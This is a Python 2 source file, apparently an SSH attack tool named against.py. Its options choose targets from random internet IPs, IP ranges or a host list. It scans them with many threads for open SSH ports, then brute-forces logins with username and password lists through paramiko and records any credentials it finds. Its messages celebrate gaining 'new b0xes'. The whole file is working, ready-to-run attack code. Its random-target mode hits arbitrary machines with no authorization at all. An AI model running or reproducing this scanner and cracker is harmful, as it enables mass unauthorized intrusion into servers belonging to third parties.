#!/usr/bin/env python # -*- coding: latin-1 -*- ###################################################### # ____ _ __ # # ___ __ __/ / /__ ___ ______ ______(_) /___ __ # # / _ \/ // / / (_- | -r | -I ', formatter_class=argparse.RawDescriptionHelpFormatter, epilog= 'examples:\n\n' \ ' scanning and attacking random ips\n' \ ' usage: ./%(prog)s -r 50 -L password.txt\n\n' \ ' scanning and attacking an ip-range\n' \ ' usage: ./%(prog)s -i 192.168.0.1-254 -u admin -l troll\n\n' \ ' attack ips from file\n' \ ' usage: ./%(prog)s -I ips.txt -L passwords.txt\n', add_help=False ) options = parser.add_argument_group('options', '') options.add_argument('-i', default=False, metavar='', help='ip-address/-range (e.g.: 192.168.0-3.1-254)') options.add_argument('-I', default=False, metavar='', help='list of target ip-addresses') options.add_argument('-r', default=False, metavar='', help='attack random hosts') options.add_argument('-p', default=22, metavar='', help='port number of sshd (default: 22)') options.add_argument('-t', default=4, metavar='', help='threads per host (default: 4)') options.add_argument('-f', default=8, metavar='', help='attack max hosts parallel (default: 8)') options.add_argument('-u', default='root', metavar='', help='single username (default: root)') options.add_argument('-U', default=False, metavar='', help='list of usernames') options.add_argument('-l', default='toor', metavar='', help='single password (default: toor)') options.add_argument('-L', default=False, metavar='', help='list of passwords') options.add_argument('-o', default=False, metavar='', help='write found logins to file') options.add_argument('-T', default=3, metavar='', help='timeout in seconds (default: 3)') options.add_argument('-V', action='store_true', help='print version of against.py and exit') args = parser.parse_args() if args.V: version() if (args.i == False) and (args.I == False) and (args.r == False): print '' parser.print_help() exit(0) return args # connect to target and checks for an open port def scan(target, port, timeout): s = socket(AF_INET, SOCK_STREAM) s.settimeout(timeout) result = s.connect_ex((target, port)) s.close() if result == 0: HOSTLIST.append(target) # creates 'x' numbers of threads and call scan() def thread_scan(args, target): port = int(args.p) to = float(args.T) bam = threading.Thread(target=scan, args=(target, port, to,)) bam.start() # scanning with up to 200 threads for targets with open port while threading.activeCount() > 200: time.sleep(0.0001) time.sleep(0.0001) # only the output when scanning for targets def scan_output(i): sys.stdout.flush() sys.stdout.write('\r[*] hosts scanned: {0} | ' \ 'possible to attack: {1}'.format(i, len(HOSTLIST))) # creates single ips by a given ip-range - parameter -i def ip_range(args): targets = args.i a = tuple(part for part in targets.split('.')) rsa = (range(4)) rsb = (range(4)) for i in range(0,4): ga = a[i].find('-') if ga != -1: rsa[i] = int(a[i][:ga]) rsb[i] = int(a[i][1+ga:]) + 1 else: rsa[i] = int(a[i]) rsb[i] = int(a[i]) + 1 print '[*] scanning %s for ssh services' % targets m = 0 for i in range (rsa[0], rsb[0]): for j in range (rsa[1], rsb[1]): for k in range (rsa[2], rsb[2]): for l in range(rsa[3], rsb[3]): target = '%d.%d.%d.%d' % (i, j, k, l) m += 1 scan_output(m) thread_scan(args, target) # waiting for the last running threads while threading.activeCount() > 1: time.sleep(0.1) scan_output(m) print '\n[*] finished scan.' # only refactor stuff def rand(): return random.randrange(0,256) # creates random ips def rand_ip(args): i = 0 print '[*] scanning random ips for ssh services' while len(HOSTLIST) < int(args.r): target = '%d.%d.%d.%d' % (rand(), rand(), rand(), rand()) i += 1 scan_output(i) thread_scan(args, target) # waiting for the last running threads while threading.activeCount() > 1: time.sleep(0.1) scan_output(i) print '\n[*] finished scan.' # checks if given filename by parameter exists def file_exists(filename): try: open(filename).readlines() except IOError: print '[-] ERROR: cannot open file \'%s\'' % filename exit(1) # read-in a file with ips def ip_list(ipfile): file_exists(ipfile) hosts = open(ipfile).readlines() for host in hosts: HOSTLIST.append(host) # write all found logins to file - parameter -o def write_logins(filename, login): outfile = open(filename, 'a') outfile.write(login) outfile.close() # connect to target and try to login def crack(target, prt, user, passw, outfile, to, i): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) user = user.replace('\n', '') passw = passw.replace('\n', '') try: ssh.connect(target, port=prt, username=user, password=passw, timeout=to) #ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('uname -a') #print ssh_stdout login = '[+] login found for %s | %s:%s' % (target, user, passw) print login if outfile: write_logins(outfile, login + '\n') ssh.close() os._exit(0) except paramiko.AuthenticationException: ssh.close() except: ssh.close() # after 8 timeouts per request the attack against $target will stopped if i < 8: i += 1 # reconnect after random seconds (between 0.2 and 0.5 sec) ra = random.uniform(0.2, 0.6) time.sleep(ra) crack(target, prt, user, passw, outfile, to, i) else: print '[-] too much timeouts - stopped attack against %s' % (target) os._exit(1) # creates 'x' number of threads and call crack() def thread_it(target, args): port = int(args.p) user = args.u userlist = args.U password = args.l passlist = args.L outfile = args.o to = float(args.T) threads = int(args.t) if userlist: user = open(userlist).readlines() else: user = [ user ] if passlist: password = open(passlist).readlines() else: password = [ password ] # looks dirty but we need it :/ try: for us in user: for pw in password: Run = threading.Thread(target=crack, args=(target, port, us, pw, outfile, to, 0,)) Run.start() # checks that we a max number of threads while threading.activeCount() > threads: time.sleep(0.01) time.sleep(0.001) # waiting for the last running threads while threading.activeCount() > 1: time.sleep(0.1) except KeyboardInterrupt: os._exit(1) # create 'x' child processes (child == cracking routine for only one target) def fork_it(args): threads = int(args.t) childs = int(args.f) len_hosts = len(HOSTLIST) print '[*] attacking %d target(s)\n' \ '[*] cracking up to %d hosts parallel\n' \ '[*] threads per host: %d' % (len_hosts, childs, threads) i = 1 for host in HOSTLIST: host = host.replace('\n', '') print '[*] performing attacks against %s [%d/%d]' % (host, i, len_hosts) hostfork = multiprocessing.Process(target=thread_it, args=(host, args)) hostfork.start() # checks that we have a max number of childs while len(multiprocessing.active_children()) >= childs: time.sleep(0.001) time.sleep(0.001) i += 1 # waiting for the last running childs while multiprocessing.active_children(): time.sleep(1) def empty_hostlist(): if len(HOSTLIST) == 0: print '[-] found no targets to attack!' exit(1) # output when against.py finished all routines def finished(): print '[*] game over!!! have fun with your new b0xes!' def main(): banner() args = argspage() if args.U: file_exists(args.U) if args.L: file_exists(args.L) if args.o: test_file(args.o) if args.i: ip_range(args) elif args.I: ip_list(args.I) else: rand_ip(args) time.sleep(0.1) empty_hostlist() fork_it(args) finished() if __name__ == '__main__': HOSTLIST = [] try: logging.disable(logging.CRITICAL) main() except KeyboardInterrupt: print '\nbye bye!!!' time.sleep(0.2) os._exit(1)